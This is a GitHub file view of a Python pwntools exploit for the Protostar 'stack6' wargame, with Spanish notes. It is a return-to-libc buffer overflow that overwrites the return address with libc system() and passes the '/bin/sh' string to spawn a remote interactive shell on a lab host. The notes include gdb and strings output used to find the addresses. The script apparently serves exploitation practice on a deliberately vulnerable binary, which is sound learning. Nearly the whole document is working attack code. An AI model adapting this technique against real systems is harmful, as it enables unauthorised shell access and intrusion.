-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathexploit_stack6.py
64 lines (54 loc) · 2.27 KB
/
exploit_stack6.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
import time
p = remote('192.168.32.143', 1234)
eip = p32(0xb7ecffb0)
arg = p32(0xb7e97000+1176511)
ebp = "DDDD" #junk data will be in frame pointer
exploit = "" #Overwriting EIP next to \x90*80
exploit += "\x90"*(80-len(ebp))
exploit += ebp #4 bytes
#Building our call system stack!!
exploit += eip #overwriting eip jumping to memory address to libc system
exploit += "AAAA" #ret address after call system where we want to go and getting shell
exploit += arg
time.sleep(2)
p.sendline(exploit)
p.interactive()
''' --------------------------------------
| STACK #call system |
| ...... |
| RET #AAAA |
| 0xb7e97000+1176511 (/bin/sh) arg |
--------------------------------------
PoC
0. No podemos realizar un buffer overflow porque tiene proteccion del ret
1. Obtenemos la libreria system:
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>
2. Vemos donde comienza la libc:
(gdb) info proc mappings
process 2306
cmdline = '/tmp/stack6'
cwd = '/tmp'
exe = '/tmp/stack6'
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x8049000 0x1000 0 /tmp/stack6
0x8049000 0x804a000 0x1000 0 /tmp/stack6
0xb7e96000 0xb7e97000 0x1000 0
0xb7e97000 0xb7fd5000 0x13e000 0 /lib/libc-2.11.2.so
0xb7fd5000 0xb7fd6000 0x1000 0x13e000 /lib/libc-2.11.2.so
0xb7fd6000 0xb7fd8000 0x2000 0x13e000 /lib/libc-2.11.2.so
0xb7fd8000 0xb7fd9000 0x1000 0x140000 /lib/libc-2.11.2.so
0xb7fd9000 0xb7fdc000 0x3000 0
0xb7fe0000 0xb7fe2000 0x2000 0
0xb7fe2000 0xb7fe3000 0x1000 0 [vdso]
0xb7fe3000 0xb7ffe000 0x1b000 0 /lib/ld-2.11.2.so
0xb7ffe000 0xb7fff000 0x1000 0x1a000 /lib/ld-2.11.2.so
0xb7fff000 0xb8000000 0x1000 0x1b000 /lib/ld-2.11.2.so
0xbffeb000 0xc0000000 0x15000 0 [stack]
3. Localizamos donde esta /bin/sh para poder pasarle como argumento
user@protostar:/tmp$ strings -t d /lib/libc-2.11.2.so | grep /bin/sh
1176511 /bin/sh
4. Ahora con la lib no hace falta hacer shellcode.
'''